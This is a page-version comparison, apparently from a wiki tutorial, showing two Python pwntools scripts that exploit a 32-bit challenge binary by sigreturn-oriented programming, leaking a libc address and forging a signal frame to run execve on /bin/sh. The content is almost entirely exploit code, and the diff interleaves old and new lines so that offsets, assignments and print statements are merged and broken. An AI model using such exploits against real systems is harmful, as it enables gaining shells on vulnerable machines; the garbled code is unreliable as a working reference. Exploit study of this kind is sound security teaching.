Versions Compared

Old Version 2

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version 3

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
languagepy
titlesrop.py
from pwn import *
  
binary = ELF('./sropsrop32')
p = process(binary.path)

p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
  
libcBase = stackAddr - 0x49020
ksigreturnsyscall = libcBase + 0x1d5de1 0x1d8de6
syscallbinsh = libcBase + 0x1d5de6 0x15902b
binshksigreturn = libcBase + 0x15902b0x1d8de0
 
print 'The base address of Libc    : ' + hex(libcBase)
print hex(sigreturn)
print hex(binsh)
print hex(syscall)
 
exploit = ''
exploit += 'Address of syscall gadget   : ' + hex(syscall)
print 'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of sigreturn()      : ' + hex(ksigreturn)

exploit = ''
exploit += "\x90" * 66
exploit += p32(ksigreturn)
exploit += p32(0x0)
 
exploit += p32(0x0)			         #GS
exploit += p32(0x0)			         #FS
exploit += p32(0x0)			         #ES
exploit += p32(0x0)			#DS	         #DS
exploit += p32(0x0)			#EDI
exploit += p32(0x0)			         #EDI
exploit += p32(0x0)         #ESI
exploit += p32(0x0)			         #EBP
exploit += p32(syscall)		     #ESP
exploit += p32(binsh)		#EBX        #EBX
exploit += p32(0x0)			         #EDX
exploit += p32(0x0)			         #ECX
exploit += p32(0xb)			 += p32(0xb)         #EAX
exploit += p32(0x0)			         #trapno
exploit += p32(0x0)			         #err
 
exploit += p32(syscall)		     #EIP
exploit += p32(0x23)		        #CS
exploit += p32(0x0)			#eflags
exploit += p32(0x0)			         #eflags
exploit += p32(0x0)         #esp_atsignal
exploit += p32(0x2b)		        #SS
 
p.send(exploit)
p.interactive()

...

Code Block
languagepy
titlesrop-pwn.py
from pwn import *
 
binary = ELF('./sropsrop32')
p = process(binary.path)

p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
  
libcBase = stackAddr - 0x49020
syscall = libcBase + 0x1d8de6
binsh = libcBase + 0x15902b
ksigreturn = libcBase + 0x1d5de1 
syscall = libcBase + 0x1d5de6 
binsh = libcBase + 0x15902b
 
print hex(libcBase)
print hex(sigreturn)
print hex(binsh)
print hex(syscall 0x1d8de0

print 'The base address of Libc    : ' + hex(libcBase)
print 'Address of syscall gadget   : ' + hex(syscall)
print 'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of sigreturn()      : ' + hex(ksigreturn)
 
exploit = ''
exploit += "\x90" * 66
exploit += p32(ksigreturn) 	#ret
exploit += p32(0x0)

frame = SigreturnFrame(kernel='amd64')
frame.eax = constants.SYS_execve
frame.ebx = binsh
frame.esp = syscall 
frame.eip = syscall
 
exploit += str(frame)

p.send(exploit)
p.interactive()

...